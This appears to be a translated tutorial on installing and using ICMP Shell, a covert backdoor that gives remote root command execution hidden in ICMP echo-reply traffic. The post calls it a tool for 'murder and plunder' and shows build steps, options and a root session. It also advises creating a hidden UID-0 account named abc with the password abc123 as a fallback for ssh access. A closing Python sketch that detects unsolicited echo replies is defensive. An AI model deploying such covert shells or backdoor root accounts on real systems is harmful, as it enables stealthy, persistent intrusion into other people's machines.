Project homepage: http://sourceforge.net/projects/icmpshell/
1. Download and installation
    wget http://nchc.dl.sourceforge.net/project/icmpshell/ish/v0.2/ish-v0.2.tar.gz
    tar zxvf ish-v0.2.tar.gz
    cd ISHELL-v0.2/
    make linux
The last step depends on the operating system. The available targets are:
    [root@localhost ISHELL-v0.2]# make
    -------------------------------
    Make with the OS from the list:
    1.) linux
    2.) bsd
    3.) solaris
    ex: make bsd
    -------------------------------
    [root@localhost ISHELL-v0.2]#
Here I chose make linux. When the build finishes, it produces two program files: the server and the client.
2. Usage
Controlled host (server):
    [root@localhost ISHELL-v0.2]# ./ishd -h
    ICMP Shell v0.2 (server) - by: Peter Kieltyka
    usage: ./ishd [options]
    options:
     -h               Display this screen
     -d               Run server in debug mode
     -i <id>          Set session id; range: 0-65535 (default: 1515)
     -t <type>        Set ICMP type (default: 0)
     -p <packetsize>  Set packet size (default: 512)
    example:
    ./ishd -i 65535 -t 0 -p 1024
As shown above, you can set these values explicitly, or leave them unset and use the defaults.
Controlling host (client):
    [root@localhost ISHELL-v0.2]# ./ish -h
    ./ish: invalid option -- 'h'
    ICMP Shell v0.2 (client) - by: Peter Kieltyka
    usage: ./ish [options] <host>
    options:
     -i <id>          Set session id; range: 0-65535 (default: 1515)
     -t <type>        Set ICMP type (default: 0)
     -p <packetsize>  Set packet size (default: 512)
    example:
    ./ish -i 65535 -t 0 -p 1024 host.com
Example:
    [root@localhost ~]# ./ish -i 1515 -t 0 -p 512 192.168.1.100
    ICMP Shell v0.2 (client) - by: Peter Kieltyka
    --------------------------------------------------
    Connecting to 192.168.1.100...done.
    # id
    uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    pwd
    /
    ifconfig
    eth0      Link encap:Ethernet  HWaddr 52:54:00:06:6D:3D
              inet addr:192.168.1.100  Bcast:192.168.1.255  Mask:255.255.255.0
              inet6 addr: fe80::5054:ff:fe06:6d3d/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:974905 errors:0 dropped:0 overruns:0 frame:0
              TX packets:170128 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:436113015 (415.9 MiB)  TX bytes:16672843 (15.9 MiB)
    [root@localhost ~]# ifconfig
    eth0      Link encap:Ethernet  HWaddr 52:54:00:C6:61:24
              inet addr:192.168.1.253  Bcast:192.168.1.255  Mask:255.255.255.0
              inet6 addr: fe80::5054:ff:fec6:6124/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:1585200 errors:0 dropped:0 overruns:0 frame:0
              TX packets:92714 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:209254584 (199.5 MiB)  TX bytes:15311207 (14.6 MiB)
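Enough said: the proverbial household essential for "murder and plunder". However, when connecting over the public internet (with the path crossing multiple routers and switches), there are cases where no output comes back after a command is entered, even though the command has in fact been executed. When that happens, you can add a user, connect over ssh instead, and delete the user when you are done. As below, add a user abc with the password abc123: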
    useradd -o -u 0 abc
    echo abc123 | passwd --stdin abc
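
The usage output above shows both ishd and ish defaulting to ICMP type 0 (echo reply), so a default session produces echo replies that answer no echo request. The following detection sketch is an added example, not part of the original post or of the ish project. Its packets are constructed, the host 192.168.1.50 is hypothetical, and placing the session id 1515 in the ICMP identifier field is an assumption.

```python
import socket
import struct
from collections import namedtuple

Icmp = namedtuple("Icmp", "src dst type ident seq payload")

def build_packet(src, dst, icmp_type, ident, seq, payload=b""):
    """Build a constructed IPv4+ICMP packet for the demo (checksums left at 0)."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + icmp

def parse_icmp(pkt):
    """Return an Icmp tuple for an IPv4/ICMP packet, or None for anything else."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != 1:
        return None
    ihl = (pkt[0] & 0x0F) * 4          # IPv4 header length in bytes
    if ihl < 20 or len(pkt) < ihl + 8:
        return None
    icmp_type, _code, _cksum, ident, seq = struct.unpack("!BBHHH", pkt[ihl:ihl + 8])
    return Icmp(socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20]),
                icmp_type, ident, seq, pkt[ihl + 8:])

def unsolicited_echo_replies(packets):
    """Flag type 0 (echo reply) packets that answer no earlier type 8 request."""
    pending, alerts = set(), []
    for raw in packets:
        m = parse_icmp(raw)
        if m and m.type == 8:          # remember each echo request seen
            pending.add((m.src, m.dst, m.ident, m.seq))
        elif m and m.type == 0:        # a reply must match a pending request
            key = (m.dst, m.src, m.ident, m.seq)
            if key not in pending:
                alerts.append(m)
            pending.discard(key)
    return alerts

# Constructed capture: one normal ping exchange, then type 0 traffic both ways.
# Assumption: the session id (default 1515) travels in the ICMP identifier field.
SAMPLE = [
    build_packet("192.168.1.50", "192.168.1.100", 8, 0x1234, 1, b"abcdefgh"),
    build_packet("192.168.1.100", "192.168.1.50", 0, 0x1234, 1, b"abcdefgh"),
    build_packet("192.168.1.253", "192.168.1.100", 0, 1515, 0, b"id\n"),
    build_packet("192.168.1.100", "192.168.1.253", 0, 1515, 0, b"uid=0(root)\n"),
]

for a in unsolicited_echo_replies(SAMPLE):
    print(f"unsolicited echo reply {a.src} -> {a.dst} id={a.ident} len={len(a.payload)}")
```

The check depends only on request/reply pairing, so it still fires when -i or -p is changed from the defaults; a session run with -t 8 would need a different rule.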